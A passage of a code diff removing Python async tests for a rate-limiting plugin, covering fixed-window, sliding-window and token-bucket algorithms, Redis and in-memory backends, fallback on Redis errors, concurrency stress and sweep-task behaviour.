kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "10/s"}, - ) - ) - assert isinstance(plugin._rate_backend._algorithm, FixedWindowAlgorithm) - - -def test_sliding_window_algorithm_instantiated(): - """sliding_window config results in a SlidingWindowAlgorithm backend.""" - plugin = _mk("10/s", algorithm=ALGORITHM_SLIDING_WINDOW) - assert isinstance(plugin._rate_backend._algorithm, SlidingWindowAlgorithm) - - -def test_token_bucket_algorithm_instantiated(): - """token_bucket config results in a TokenBucketAlgorithm backend.""" - plugin = _mk("10/s", algorithm=ALGORITHM_TOKEN_BUCKET) - assert isinstance(plugin._rate_backend._algorithm, TokenBucketAlgorithm) - - -# --------------------------------------------------------------------------- -# Sliding window correctness -# --------------------------------------------------------------------------- - - -@pytest.mark.asyncio -async def test_sliding_window_basic_enforcement(): - """Sliding window enforces the limit correctly under steady traffic.""" - plugin = _mk("3/s", algorithm=ALGORITHM_SLIDING_WINDOW) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - r1 = await plugin.tool_pre_invoke(payload, ctx) - r2 = await plugin.tool_pre_invoke(payload, ctx) - r3 = await plugin.tool_pre_invoke(payload, ctx) - r4 = await plugin.tool_pre_invoke(payload, ctx) # should be blocked - - assert r1.violation is None - assert r2.violation is None - assert r3.violation is None - assert r4.violation is not None - assert r4.violation.http_status_code == 429 - - -@pytest.mark.asyncio -async def test_sliding_window_prevents_burst_at_boundary(): - """ - Sliding window does NOT allow 2× the limit at a window boundary. - - Unlike fixed window, the sliding window tracks exact timestamps. When - requests straddle a boundary, old timestamps are still within the window - and count against the limit — no burst is possible. - """ - plugin = _mk("5/s", algorithm=ALGORITHM_SLIDING_WINDOW) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - allowed_total = 0 - - with patch("plugins.rate_limiter.rate_limiter.time") as mock_time: - # End of window W1: fill the limit - mock_time.time.return_value = 1000.9 - for _ in range(5): - r = await plugin.tool_pre_invoke(payload, ctx) - if r.violation is None: - allowed_total += 1 - - # Start of window W2: timestamps from W1 are still within the 1s window - mock_time.time.return_value = 1001.1 - for _ in range(5): - r = await plugin.tool_pre_invoke(payload, ctx) - if r.violation is None: - allowed_total += 1 - - # Sliding window: only requests older than 1s are evicted - # At t=1001.1, cutoff = 1000.1 — all 5 requests at t=1000.9 are still inside - assert allowed_total <= 6, f"Sliding window should prevent boundary burst. Got {allowed_total} allowed " f"(fixed window would allow 10, sliding window should block most of W2)." - - -@pytest.mark.asyncio -async def test_sliding_window_allows_after_window_passes(): - """After the full window duration passes, the sliding window resets naturally.""" - plugin = _mk("2/s", algorithm=ALGORITHM_SLIDING_WINDOW) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - # Exhaust the limit - await plugin.tool_pre_invoke(payload, ctx) - await plugin.tool_pre_invoke(payload, ctx) - blocked = await plugin.tool_pre_invoke(payload, ctx) - assert blocked.violation is not None - - # Wait for the window to pass - await asyncio.sleep(1.1) - - # Should be allowed again - r = await plugin.tool_pre_invoke(payload, ctx) - assert r.violation is None, "Requests should be allowed after the sliding window passes" - - -@pytest.mark.asyncio -async def test_sliding_window_returns_429_and_headers(): - """Sliding window violations return HTTP 429 with rate limit headers.""" - plugin = _mk("1/s", algorithm=ALGORITHM_SLIDING_WINDOW) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - await plugin.tool_pre_invoke(payload, ctx) - result = await plugin.tool_pre_invoke(payload, ctx) - - assert result.violation is not None - assert result.violation.http_status_code == 429 - assert result.violation.code == "RATE_LIMIT" - assert "X-RateLimit-Limit" in result.violation.http_headers - assert "Retry-After" in result.violation.http_headers - - -# --------------------------------------------------------------------------- -# Token bucket correctness -# --------------------------------------------------------------------------- - - -@pytest.mark.asyncio -async def test_token_bucket_basic_enforcement(): - """Token bucket enforces the limit — once tokens are exhausted requests are blocked.""" - plugin = _mk("3/s", algorithm=ALGORITHM_TOKEN_BUCKET) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - r1 = await plugin.tool_pre_invoke(payload, ctx) - r2 = await plugin.tool_pre_invoke(payload, ctx) - r3 = await plugin.tool_pre_invoke(payload, ctx) - r4 = await plugin.tool_pre_invoke(payload, ctx) # bucket empty - - assert r1.violation is None - assert r2.violation is None - assert r3.violation is None - assert r4.violation is not None - assert r4.violation.http_status_code == 429 - - -@pytest.mark.asyncio -async def test_token_bucket_allows_burst_up_to_capacity(): - """ - Token bucket allows an immediate burst up to the full bucket capacity. - - A user who has been idle accumulates tokens. When they send a burst of - requests they can use all accumulated tokens at once — this is intentional - token_bucket behaviour, unlike fixed or sliding window which always enforce - a per-window ceiling. - """ - plugin = _mk("5/s", algorithm=ALGORITHM_TOKEN_BUCKET) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - # Send all 5 requests immediately (burst from a full bucket) - results = [] - for _ in range(5): - r = await plugin.tool_pre_invoke(payload, ctx) - results.append(r) - - allowed = sum(1 for r in results if r.violation is None) - assert allowed == 5, f"Token bucket should allow a burst of 5 from a full bucket, got {allowed} allowed" - - # 6th request: bucket is now empty - r6 = await plugin.tool_pre_invoke(payload, ctx) - assert r6.violation is not None, "Bucket should be empty after a full burst" - - -@pytest.mark.asyncio -async def test_token_bucket_refills_over_time(): - """Tokens refill at the configured rate — requests are allowed again after waiting.""" - plugin = _mk("5/s", algorithm=ALGORITHM_TOKEN_BUCKET) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - # Drain the bucket - for _ in range(5): - await plugin.tool_pre_invoke(payload, ctx) - - blocked = await plugin.tool_pre_invoke(payload, ctx) - assert blocked.violation is not None, "Bucket should be empty" - - # Wait for at least 1 token to refill (5 tokens/s → 1 token per 0.2s) - await asyncio.sleep(0.3) - - r = await plugin.tool_pre_invoke(payload, ctx) - assert r.violation is None, "At least 1 token should have refilled after 0.3s" - - -@pytest.mark.asyncio -async def test_token_bucket_returns_429_and_headers(): - """Token bucket violations return HTTP 429 with rate limit headers.""" - plugin = _mk("1/s", algorithm=ALGORITHM_TOKEN_BUCKET) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - await plugin.tool_pre_invoke(payload, ctx) - result = await plugin.tool_pre_invoke(payload, ctx) - - assert result.violation is not None - assert result.violation.http_status_code == 429 - assert result.violation.code == "RATE_LIMIT" - assert "X-RateLimit-Limit" in result.violation.http_headers - assert "Retry-After" in result.violation.http_headers - - -# --------------------------------------------------------------------------- -# Algorithm isolation — each instance gets its own independent store -# --------------------------------------------------------------------------- - - -@pytest.mark.asyncio -async def test_two_plugin_instances_different_algorithms_independent(): - """Two plugin instances using different algorithms have completely independent stores.""" - plugin_fw = _mk("2/s", algorithm=ALGORITHM_FIXED_WINDOW) - plugin_sw = _mk("2/s", algorithm=ALGORITHM_SLIDING_WINDOW) - plugin_tb = _mk("2/s", algorithm=ALGORITHM_TOKEN_BUCKET) - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - # Exhaust fixed window - await plugin_fw.tool_pre_invoke(payload, ctx) - await plugin_fw.tool_pre_invoke(payload, ctx) - blocked_fw = await plugin_fw.tool_pre_invoke(payload, ctx) - assert blocked_fw.violation is not None, "fixed_window alice should be blocked" - - # sliding_window and token_bucket instances are completely unaffected - r_sw = await plugin_sw.tool_pre_invoke(payload, ctx) - r_tb = await plugin_tb.tool_pre_invoke(payload, ctx) - assert r_sw.violation is None, "sliding_window has its own store — should not be blocked" - assert r_tb.violation is None, "token_bucket has its own store — should not be blocked" - - -# --------------------------------------------------------------------------- -# Redis + token_bucket -# --------------------------------------------------------------------------- - - -def test_token_bucket_with_redis_backend_uses_redis_backend(): - """token_bucket with backend=redis instantiates a RedisBackend, not MemoryBackend.""" - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={ - "by_user": "10/s", - "algorithm": "token_bucket", - "backend": "redis", - "redis_url": "redis://localhost:6379/0", - }, - ) - ) - assert isinstance(plugin._rate_backend, RedisBackend) - assert plugin._rate_backend._algorithm_name == ALGORITHM_TOKEN_BUCKET - - -@pytest.mark.asyncio -async def test_redis_token_bucket_enforces_limit(): - """RedisBackend with token_bucket enforces the limit via the Lua script.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - mock_client = AsyncMock() - # First call: allowed=1, remaining=0, time_to_next=0 - # Second call: allowed=0, remaining=0, time_to_next=5 - mock_client.eval.side_effect = [ - [1, 0, 0], - [0, 0, 5], - ] - - backend = RedisBackend( - redis_url="redis://localhost:6379/0", - algorithm_name=ALGORITHM_TOKEN_BUCKET, - _client=mock_client, - ) - - allowed1, _, _, meta1 = await backend.allow("user:alice", "1/s") - allowed2, _, _, meta2 = await backend.allow("user:alice", "1/s") - - assert allowed1 is True - assert meta1["remaining"] == 0 - assert allowed2 is False - assert meta2["remaining"] == 0 - assert meta2["reset_in"] == 5 - - -@pytest.mark.asyncio -async def test_redis_token_bucket_falls_back_to_memory_on_redis_error(): - """RedisBackend token_bucket falls back to MemoryBackend when Redis is unavailable.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - mock_client = AsyncMock() - mock_client.eval.side_effect = ConnectionError("Redis unavailable") - - fallback = MemoryBackend(TokenBucketAlgorithm()) - backend = RedisBackend( - redis_url="redis://localhost:6379/0", - algorithm_name=ALGORITHM_TOKEN_BUCKET, - fallback=fallback, - _client=mock_client, - ) - - allowed, _, _, _ = await backend.allow("user:alice", "5/s") - assert allowed is True - - -# ============================================================================ -# Concurrency Stress Tests -# ============================================================================ - - -@pytest.mark.asyncio -async def test_concurrent_stress_same_key_does_not_over_allow(): - """ - 100 concurrent tasks hitting the same user key with a limit of 10/s. - - The asyncio.Lock in MemoryBackend serialises all allow() calls so the - count increments atomically. Exactly 10 requests must be allowed — no - more, no fewer. - - This is a stronger version of test_concurrent_requests_respect_limit: - 5× more load to surface any lock-ordering or double-increment bugs that - a small gather might miss. - """ - plugin = _mk("10/s") - ctx = PluginContext(global_context=GlobalContext(request_id="stress", user="alice")) - payload = ToolPreInvokePayload(name="tool", arguments={}) - - results = await asyncio.gather(*[plugin.tool_pre_invoke(payload, ctx) for _ in range(100)]) - - allowed = sum(1 for r in results if r.violation is None) - assert allowed == 10, f"Expected exactly 10 allowed, got {allowed} — lock may not be serialising correctly" - - -@pytest.mark.asyncio -@pytest.mark.parametrize("algorithm", [ALGORITHM_FIXED_WINDOW, ALGORITHM_SLIDING_WINDOW, ALGORITHM_TOKEN_BUCKET]) -async def test_concurrent_stress_all_algorithms_do_not_over_allow(algorithm: str): - """ - 100 concurrent tasks against a limit of 15/s, run for each algorithm. - - Each algorithm must allow at most 15 requests. Sliding window and token - bucket may allow fewer due to their stricter enforcement; none may allow - more. This confirms the asyncio.Lock path holds regardless of which - algorithm is selected. - """ - plugin = _mk("15/s", algorithm=algorithm) - ctx = PluginContext(global_context=GlobalContext(request_id="algo-stress", user="bob")) - payload = ToolPreInvokePayload(name="tool", arguments={}) - - results = await asyncio.gather(*[plugin.tool_pre_invoke(payload, ctx) for _ in range(100)]) - - allowed = sum(1 for r in results if r.violation is None) - assert allowed <= 15, f"[{algorithm}] Over-allowed: {allowed} > 15 — algorithm may not be thread-safe" - - -@pytest.mark.asyncio -async def test_concurrent_stress_window_boundary_total_does_not_exceed_double_limit(): - """ - Fixed window burst-at-boundary under concurrent load. - - 50 tasks fire before the window resets, 50 fire after. The documented - worst case for fixed_window is 2× the limit (N requests at end of W1 + - N at start of W2). Under concurrent asyncio load the total allowed must - never exceed 2× the limit — if it does, the lock is broken. - - Note: sliding_window and token_bucket are not subject to this bound; - this test is intentionally fixed_window only. - """ - limit = 10 - plugin = _mk(f"{limit}/s") - ctx = PluginContext(global_context=GlobalContext(request_id="boundary", user="carol")) - payload = ToolPreInvokePayload(name="tool", arguments={}) - - # First burst — within the current window - first_wave = await asyncio.gather(*[plugin.tool_pre_invoke(payload, ctx) for _ in range(50)]) - - # Advance time past the window boundary - backend = plugin._rate_backend - if isinstance(backend, MemoryBackend) and hasattr(backend._algorithm, "_store"): - backend._algorithm._store.clear() - - # Second burst — new window - second_wave = await asyncio.gather(*[plugin.tool_pre_invoke(payload, ctx) for _ in range(50)]) - - total_allowed = sum(1 for r in first_wave + second_wave if r.violation is None) - assert total_allowed <= 2 * limit, f"Total allowed {total_allowed} exceeds 2× limit ({2 * limit}) — " f"fixed_window boundary burst is worse than documented" - - -# ============================================================================ -# Sweep Task Lifecycle Tests -# ============================================================================ - - -@pytest.mark.asyncio -async def test_sweep_evicts_expired_fixed_window_keys(): - """ - After a fixed-window expires, the sweep task removes the key from the store. - - We exhaust the limit, then manually back-date the window start so the sweep - sees the window as expired, run one sweep cycle, and confirm the store is - empty. A subsequent request must be allowed again (fresh window). - """ - backend = MemoryBackend(FixedWindowAlgorithm(), sweep_interval=999) - # Exhaust a 1/s limit - await backend.allow("user:dave", "1/s") - await backend.allow("user:dave", "1/s") - - assert len(backend._algorithm._store) == 1 - - # Back-date the window start by 2 seconds so sweep sees it as expired - for wnd in backend._algorithm._store.values(): - wnd.window_start -= 2 - - await backend._algorithm.sweep(backend._lock) - - assert len(backend._algorithm._store) == 0, "Expired window key was not evicted by sweep" - - # A fresh request should be allowed now - allowed, *_ = await backend.allow("user:dave", "1/s") - assert allowed is True, "Request after sweep eviction should start a fresh window" - - -@pytest.mark.asyncio -async def test_sweep_task_restarts_after_cancellation(): - """ - If the background sweep task is cancelled (e.g. during a test teardown or - event loop churn), the next call to allow() must recreate it via - _ensure_sweep_task(). - """ - backend = MemoryBackend(FixedWindowAlgorithm(), sweep_interval=999) - - # Trigger task creation - await backend.allow("user:eve", "5/s") - task = backend._sweep_task - assert task is not None and not task.done() - - # Cancel the task — simulates teardown or loop restart - task.cancel() - try: - await task - except asyncio.CancelledError: - pass - - assert backend._sweep_task.done() - - # Next allow() call must recreate the sweep task - await backend.allow("user:eve", "5/s") - assert backend._sweep_task is not None - assert not backend._sweep_task.done(), "Sweep task was not recreated after cancellation" - - -@pytest.mark.asyncio -async def test_sweep_does_not_evict_active_keys(): - """ - Keys with recent activity must survive a sweep cycle. - - We make a request (creating a live window), run the sweep immediately - without back-dating the window, and confirm the key is still present. - """ - backend = MemoryBackend(FixedWindowAlgorithm(), sweep_interval=999) - await backend.allow("user:frank", "10/s") - - assert len(backend._algorithm._store) == 1 - - # Run sweep — window is fresh, should NOT be evicted - await backend._algorithm.sweep(backend._lock) - - assert len(backend._algorithm._store) == 1, "Active window key was incorrectly evicted by sweep" - - -# ============================================================================ -# Clock / Timing Edge Case Tests -# ============================================================================ - - -@pytest.mark.asyncio -async def test_token_bucket_caps_at_capacity_after_long_inactivity(): - """ - A token bucket that has been inactive for a very long time must not - accumulate more tokens than its capacity. - - Without a cap, `tokens = min(count, tokens + elapsed * refill_rate)` - would overflow. This test back-dates last_refill by 24 hours and confirms - the bucket holds exactly `count` tokens — not more. - """ - algorithm = TokenBucketAlgorithm() - lock = asyncio.Lock() - - # First request — creates the bucket with count-1 tokens - await algorithm.allow(lock, "user:grace", 10, 60) - - # Back-date last_refill by 24 hours to simulate long inactivity - bucket = algorithm._store["user:grace"] - bucket.last_refill -= 86400 - - # Next request should be allowed and tokens must not exceed capacity (10) - allowed, limit, _, meta = await algorithm.allow(lock, "user:grace", 10, 60) - assert allowed is True - assert meta["remaining"] <= limit, f"Token bucket overflowed: remaining={meta['remaining']} > limit={limit}" - - -@pytest.mark.asyncio -async def test_fixed_window_resets_after_window_duration_elapses(): - """ - Once a fixed window's duration has elapsed, the next request must open a - fresh window and be allowed — even if the limit was previously exhausted. - - We exhaust a 2/s limit, then advance the window start backward by 2 seconds - (simulating time passing), and confirm the next request is allowed. - """ - algorithm = FixedWindowAlgorithm() - lock = asyncio.Lock() - - await algorithm.allow(lock, "user:henry", 2, 1) - await algorithm.allow(lock, "user:henry", 2, 1) - blocked, *_ = await algorithm.allow(lock, "user:henry", 2, 1) - assert blocked is False, "Limit should be exhausted at this point" - - # Simulate 2 seconds passing by back-dating the window start - for wnd in algorithm._store.values(): - wnd.window_start -= 2 - - allowed, *_ = await algorithm.allow(lock, "user:henry", 2, 1) - assert allowed is True, "Request after window expiry should open a fresh window and be allowed" - - -@pytest.mark.asyncio -async def test_sliding_window_enforces_correctly_with_duplicate_timestamps(): - """ - When multiple requests arrive within the same millisecond, time.time() - may return identical float values. The sliding window must still enforce - the limit correctly — duplicate timestamps must each count as a distinct - request. - """ - algorithm = SlidingWindowAlgorithm() - lock = asyncio.Lock() - fixed_time = time.time() - - with patch("plugins.rate_limiter.rate_limiter.time") as mock_time: - mock_time.time.return_value = fixed_time - - # Send limit+1 requests all at the same timestamp - limit = 3 - results = [] - for _ in range(limit + 1): - result = await algorithm.allow(lock, "user:iris", limit, 60) - results.append(result) - - allowed = sum(1 for r, *_ in results if r is True) - assert allowed == limit, f"Expected exactly {limit} allowed with duplicate timestamps, got {allowed}" - - -# ============================================================================ -# Redis Error Mode Tests -# ============================================================================ - - -@pytest.mark.asyncio -async def test_redis_timeout_falls_back_to_memory(): - """ - A transient TimeoutError from the Redis client must trigger the memory - fallback when redis_fallback=True. The request must be allowed — a Redis - timeout must never silently block traffic. - """ - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - mock_client = AsyncMock() - mock_client.eval.side_effect = TimeoutError("Redis timed out") - - fallback = MemoryBackend(FixedWindowAlgorithm()) - backend = RedisBackend( - redis_url="redis://localhost:6379/0", - algorithm_name=ALGORITHM_FIXED_WINDOW, - fallback=fallback, - _client=mock_client, - ) - - allowed, *_ = await backend.allow("user:jack", "5/s") - assert allowed is True, "Transient Redis timeout must fall back to memory and allow the request" - - -@pytest.mark.asyncio -async def test_redis_lua_script_error_fails_open_without_fallback(): - """ - If the Redis Lua script raises a ResponseError (e.g. after a Redis restart - that flushed cached scripts), and no fallback is configured, the request - must be allowed — fail-open is the documented behaviour when - redis_fallback=False. - """ - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - try: - # Third-Party - from redis.exceptions import ResponseError # noqa: PLC0415 - except ImportError: - pytest.skip("redis package not installed") - - mock_client = AsyncMock() - mock_client.eval.side_effect = ResponseError("NOSCRIPT No matching script") - - backend = RedisBackend( - redis_url="redis://localhost:6379/0", - algorithm_name=ALGORITHM_FIXED_WINDOW, - fallback=None, - _client=mock_client, - ) - - allowed, *_ = await backend.allow("user:kate", "5/s") - assert allowed is True, "Lua script error without fallback must fail open (allow request)" - - -@pytest.mark.asyncio -async def test_redis_fallback_and_redis_counters_are_independent(): - """ - When Redis is down, the memory fallback tracks its own counter. When Redis - recovers, the Redis counter starts fresh — the fallback counter must not - bleed into Redis or vice versa. - - We exhaust the fallback limit during the outage, then restore Redis and - confirm the first Redis-backed request is allowed (fresh Redis counter). - """ - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - mock_client = AsyncMock() - - # Phase 1: Redis is down — all calls go to fallback - mock_client.eval.side_effect = ConnectionError("Redis down") - fallback = MemoryBackend(FixedWindowAlgorithm()) - backend = RedisBackend( - redis_url="redis://localhost:6379/0", - algorithm_name=ALGORITHM_FIXED_WINDOW, - fallback=fallback, - _client=mock_client, - ) - - # Exhaust the fallback limit (2/s) - await backend.allow("user:leo", "2/s") - await backend.allow("user:leo", "2/s") - fallback_blocked, *_ = await backend.allow("user:leo", "2/s") - assert fallback_blocked is False, "Fallback must enforce limit during Redis outage" - - # Phase 2: Redis recovers — return a valid fixed-window result ([1, 60]) - mock_client.eval.side_effect = None - mock_client.eval.return_value = [1, 60] # count=1, ttl=60 → fresh window - - redis_allowed, *_ = await backend.allow("user:leo", "2/s") - assert redis_allowed is True, "Redis counter must start fresh after recovery — fallback state must not carry over" - - -# ============================================================================ -# Configuration Edge Case Tests -# ============================================================================ - - -@pytest.mark.asyncio -async def test_very_large_rate_limit_does_not_overflow(): - """ - A rate limit of 1,000,000/min must initialise without error and correctly - allow the first request. This guards against integer overflow in the counter - or remaining calculation. - """ - plugin = _mk("1000000/m") - ctx = PluginContext(global_context=GlobalContext(request_id="large", user="user-large")) - payload = ToolPreInvokePayload(name="tool", arguments={}) - - result = await plugin.tool_pre_invoke(payload, ctx) - assert result.violation is None, "First request under a very large limit must be allowed" - - headers = result.http_headers or {} - remaining = int(headers.get("X-RateLimit-Remaining", -1)) - assert remaining == 999999, f"Remaining should be limit-1=999999, got {remaining}" - - -@pytest.mark.asyncio -async def test_very_small_rate_limit_allows_first_request(): - """ - A rate limit of 1/hour must allow the first request and block the second. - - This exercises the token bucket and fixed window at an extremely low refill - rate (1/3600 tokens per second) — floating-point precision must not cause - the first request to be incorrectly blocked. - """ - for algorithm in [ALGORITHM_FIXED_WINDOW, ALGORITHM_SLIDING_WINDOW, ALGORITHM_TOKEN_BUCKET]: - plugin = _mk("1/h", algorithm=algorithm) - ctx = PluginContext(global_context=GlobalContext(request_id="small", user=f"user-small-{algorithm}")) - payload = ToolPreInvokePayload(name="tool", arguments={}) - - first = await plugin.tool_pre_invoke(payload, ctx) - assert first.violation is None, f"[{algorithm}] First request under 1/h limit must be allowed" - - second = await plugin.tool_pre_invoke(payload, ctx) - assert second.violation is not None, f"[{algorithm}] Second request under 1/h limit must be blocked" - - -def test_by_tool_with_special_character_tool_names(): - """ - Tool names containing spaces, slashes, and unicode characters must be - accepted by _validate_config and stored as-is. The rate limiter must - match by exact key — no normalisation or stripping. - """ - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={ - "by_tool": { - "my tool/v2": "5/m", - "outil-résumé": "10/m", - "工具": "3/m", - } - }, - ) - ) - # Config must be accepted without errors - assert plugin._cfg.by_tool is not None - assert "my tool/v2" in plugin._cfg.by_tool - assert "outil-résumé" in plugin._cfg.by_tool - assert "工具" in plugin._cfg.by_tool - - -# ============================================================================ -# P0 Unit Tests — Redis/Memory Correctness -# ============================================================================ - - -@pytest.mark.asyncio -async def test_redis_sliding_window_counts_multiple_requests_with_same_timestamp(): - """ - The fixed sliding window Lua script uses a unique member per request - (ARGV[4] = uuid), so concurrent requests at the same timestamp each occupy - their own sorted-set slot. Three requests at an identical timestamp against - a limit of 2/s: first two allowed, third blocked. - """ - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - fixed_ts = 1_700_000_000.0 - - # Simulate the FIXED Lua behaviour: unique member per request, check before ZADD - store: dict[str, dict] = {} - - async def fake_eval(script, numkeys, key, *args): - if "ZREMRANGEBYSCORE" in script: - now = float(args[0]) - window = float(args[1]) - limit_val = int(args[2]) - member = str(args[3]) # unique member (uuid hex from _allow_sliding) - cutoff = now - window - if key not in store: - store[key] = {} - store[key] = {m: s for m, s in store[key].items() if s > cutoff} - count = len(store[key]) - oldest_ts = min(store[key].values()) if store[key] else 0 - if count >= limit_val: - return [0, count, oldest_ts] # [allowed=0, count, oldest_ts] - store[key][member] = now - count += 1 - oldest_ts = min(store[key].values()) if store[key] else 0 - return [1, count, oldest_ts] # [allowed=1, count, oldest_ts] - return [0, 0, 0] - - mock_client = AsyncMock() - mock_client.eval.side_effect = fake_eval - - backend = RedisBackend( - redis_url="redis://localhost:6379/0", - algorithm_name=ALGORITHM_SLIDING_WINDOW, - fallback=None, - _client=mock_client, - ) - - limit = "2/s" - with patch("plugins.rate_limiter.rate_limiter.time") as mock_time: - mock_time.time.return_value = fixed_ts - r1, *_ = await backend.allow("user:test", limit) - r2, *_ = await backend.allow("user:test", limit) - r3, *_ = await backend.allow("user:test", limit) - - assert r1 is True - assert r2 is True - assert r3 is False, "Third request at same timestamp must be blocked — " "each request now occupies its own sorted-set slot via unique member" - - -@pytest.mark.asyncio -async def test_sliding_window_memory_evicts_idle_keys_after_window_expires(): - """ - When a sliding window key has no activity for longer than the window duration, - the next allow() call must naturally evict stale timestamps and treat the key - as fresh — allowing requests up to the full limit again. - - This tests the natural eviction path via allow() itself, not the sweep task. - """ - algorithm = SlidingWindowAlgorithm() - lock = asyncio.Lock() - now = time.time() - - with patch("plugins.rate_limiter.rate_limiter.time") as mock_time: - # Exhaust the limit now - mock_time.time.return_value = now - await algorithm.allow(lock, "user:test", 2, 1) - await algorithm.allow(lock, "user:test", 2, 1) - blocked, *_ = await algorithm.allow(lock, "user:test", 2, 1) - assert blocked is False - - # Advance time past the window — all previous timestamps are now stale - mock_time.time.return_value = now + 2.0 - - # Next call must see an empty window and allow the request - allowed, *_ = await algorithm.allow(lock, "user:test", 2, 1) - assert allowed is True, "After window expires, allow() must evict stale timestamps and allow fresh requests" - - -@pytest.mark.asyncio -async def test_memory_and_redis_sliding_window_have_same_allow_block_sequence(): - """ - Memory backend and Redis backend must produce identical allow/block decisions - for the same request timeline. This parity test uses an in-process Redis - simulator that faithfully implements the fixed sliding window Lua script logic: - unique member per request (ARGV[4]) and count check before ZADD. - """ - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - # In-process Redis simulator for the FIXED sliding window Lua script - sim_store: dict[str, dict] = {} - - async def sliding_sim(script, numkeys, key, *args): - now = float(args[0]) - window = float(args[1]) - limit_val = int(args[2]) - member = str(args[3]) # unique member from _allow_sliding - cutoff = now - window - if key not in sim_store: - sim_store[key] = {} - sim_store[key] = {m: s for m, s in sim_store[key].items() if s > cutoff} - count = len(sim_store[key]) - oldest_ts = min(sim_store[key].values()) if sim_store[key] else now - # Check before ZADD — blocked requests do NOT inflate the set - if count >= limit_val: - return [0, count, oldest_ts] # [allowed=0, count, oldest_ts] - sim_store[key][member] = now - count += 1 - oldest_ts = min(sim_store[key].values()) if sim_store[key] else now - return [1, count, oldest_ts] # [allowed=1, count, oldest_ts] - - mock_client = AsyncMock() - mock_client.eval.side_effect = sliding_sim - - redis_backend = RedisBackend( - redis_url="redis://localhost:6379/0", - algorithm_name=ALGORITHM_SLIDING_WINDOW, - fallback=None, - _client=mock_client, - ) - memory_backend = MemoryBackend(SlidingWindowAlgorithm()) - - limit = "3/s" - base = time.time() - offsets = [0.0, 0.1, 0.2, 0.5, 0.8, 1.1, 1.2, 1.5] - - redis_decisions = [] - memory_decisions = [] - - for offset in offsets: - t = base + offset - with patch("plugins.rate_limiter.rate_limiter.time") as mock_time: - mock_time.time.return_value = t - r_allowed, *_ = await redis_backend.allow("user:test", limit) - m_allowed, *_ = await memory_backend.allow("user:test", limit) - redis_decisions.append(r_allowed) - memory_decisions.append(m_allowed) - - assert redis_decisions == memory_decisions, f"Memory and Redis sliding window diverged:\n" f" Redis: {redis_decisions}\n" f" Memory: {memory_decisions}" - - -@pytest.mark.asyncio -async def test_memory_and_redis_token_bucket_have_same_allow_block_sequence(): - """ - Memory backend and Redis backend must produce identical allow/block decisions - for the token bucket algorithm across a fixed request timeline. - Uses an in-process simulator of the token bucket Lua script. - """ - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - # In-process Redis simulator for token bucket - sim_bucket: dict[str, dict] = {} - - async def token_bucket_sim(script, numkeys, key, *args): - capacity = float(args[0]) - rate = float(args[1]) - now = float(args[2]) - - if key not in sim_bucket: - tokens = capacity - 1 - sim_bucket[key] = {"tokens": tokens, "last_refill": now} - return [1, int(tokens), 0] - - b = sim_bucket[key] - elapsed = now - b["last_refill"] - tokens = min(capacity, b["tokens"] + elapsed * rate) - - if tokens >= 1.0: - tokens -= 1.0 - allowed = 1 - time_to_next = 0 - else: - allowed = 0 - time_to_next = int((1.0 - tokens) / rate) + 1 - - sim_bucket[key] = {"tokens": tokens, "last_refill": now} - return [allowed, int(tokens), time_to_next] - - mock_client = AsyncMock() - mock_client.eval.side_effect = token_bucket_sim - - redis_backend = RedisBackend( - redis_url="redis://localhost:6379/0", - algorithm_name=ALGORITHM_TOKEN_BUCKET, - fallback=None, - _client=mock_client, - ) - memory_backend = MemoryBackend(TokenBucketAlgorithm()) - - limit = "3/s" - base = time.time() - offsets = [0.0, 0.1, 0.2, 0.4, 0.8, 1.0, 1.2, 1.6, 2.0] - - redis_decisions = [] - memory_decisions = [] - - for offset in offsets: - t = base + offset - with patch("plugins.rate_limiter.rate_limiter.time") as mock_time: - mock_time.time.return_value = t - r_allowed, *_ = await redis_backend.allow("user:test", limit) - m_allowed, *_ = await memory_backend.allow("user:test", limit) - redis_decisions.append(r_allowed) - memory_decisions.append(m_allowed) - - assert redis_decisions == memory_decisions, f"Memory and Redis token bucket diverged:\n" f" Redis: {redis_decisions}\n" f" Memory: {memory_decisions}" - - -# --------------------------------------------------------------------------- -# P1 Unit Tests — header consistency and correctness -# --------------------------------------------------------------------------- - - -@pytest.mark.asyncio -async def test_token_bucket_success_headers_are_consistent_between_memory_and_redis(): - """ - For allowed token bucket requests, both memory and Redis backends must - produce the same X-RateLimit-Remaining value and X-RateLimit-Limit == configured limit. - """ - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - sim_bucket: dict[str, dict] = {} - - async def token_bucket_sim(script, numkeys, key, *args): - capacity = float(args[0]) - rate = float(args[1]) - now = float(args[2]) - if key not in 